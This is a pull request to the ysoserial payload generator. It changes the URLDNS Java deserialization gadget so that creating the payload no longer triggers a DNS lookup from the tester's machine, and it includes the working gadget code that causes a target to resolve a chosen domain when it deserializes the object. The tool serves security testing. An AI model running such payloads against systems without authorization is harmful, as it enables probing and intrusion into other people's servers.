### PR TITLE
URLDNS: Small fix to avoid DNS resolution while generating the payload

### DIFF
--- a/src/main/java/ysoserial/payloads/URLDNS.java
+++ b/src/main/java/ysoserial/payloads/URLDNS.java
@@ -1,12 +1,11 @@
 package ysoserial.payloads;
 
-import java.lang.reflect.InvocationHandler;
+import java.io.IOException;
+import java.net.InetAddress;
+import java.net.URLConnection;
+import java.net.URLStreamHandler;
 import java.util.HashMap;
-import java.util.LinkedHashSet;
-import java.util.Hashtable;
 import java.net.URL;
-
-import javax.xml.transform.Templates;
 
 import ysoserial.payloads.annotation.Dependencies;
 import ysoserial.payloads.util.PayloadRunner;
@@ -44,8 +43,13 @@ import ysoserial.payloads.util.Reflections;
 public class URLDNS implements ObjectPayload<Object> {
 
         public Object getObject(final String url) throws Exception {
+
+                //Avoid DNS resolution during payload creation
+                //Since the field <code>java.net.URL.handler</code> is transient, it will not be part of the serialized payload.
+                URLStreamHandler handler = new SilentURLStreamHandler();
+
                 HashMap ht = new HashMap(); // HashMap that will contain the URL
-                URL u = new URL(url); // URL to use as the Key
+                URL u = new URL(null, url, handler); // URL to use as the Key
                 ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.
 
                 Reflections.setFieldValue(u, "hashCode", -1); // During the put above, the URL's hashCode is calculated and cached. This resets that so the next time hashCode is called a DNS lookup will be triggered.
@@ -57,4 +61,23 @@ public class URLDNS implements ObjectPayload<Object> {
                 PayloadRunner.run(URLDNS.class, args);
         }
 
+        /**
+         * <p>This instance of URLStreamHandler is used to avoid any DNS resolution while creating the URL instance.
+         * DNS resolution is used for vulnerability detection. It is important not to probe the given URL prior
+         * using the serialized object.</p>
+         *
+         * <b>Potential false negative:</b>
+         * <p>If the DNS name is resolved first from the tester computer, the targeted server might get a cache hit on the
+         * second resolution.</p>
+         */
+        static class SilentURLStreamHandler extends URLStreamHandler {
+
+                protected URLConnection openConnection(URL u) throws IOException {
+                        return null;
+                }
+
+                protected synchronized InetAddress getHostAddress(URL u) {
+                        return null;
+                }
+        }
 }


### PR DESCRIPTION
DNS resolution is used for vulnerability detection. It is important not to probe the given URL prior using the serialized object.

**Scenario covered:**
If the DNS name is resolved first from the tester computer, the targeted server might get a cache hit on the second resolution.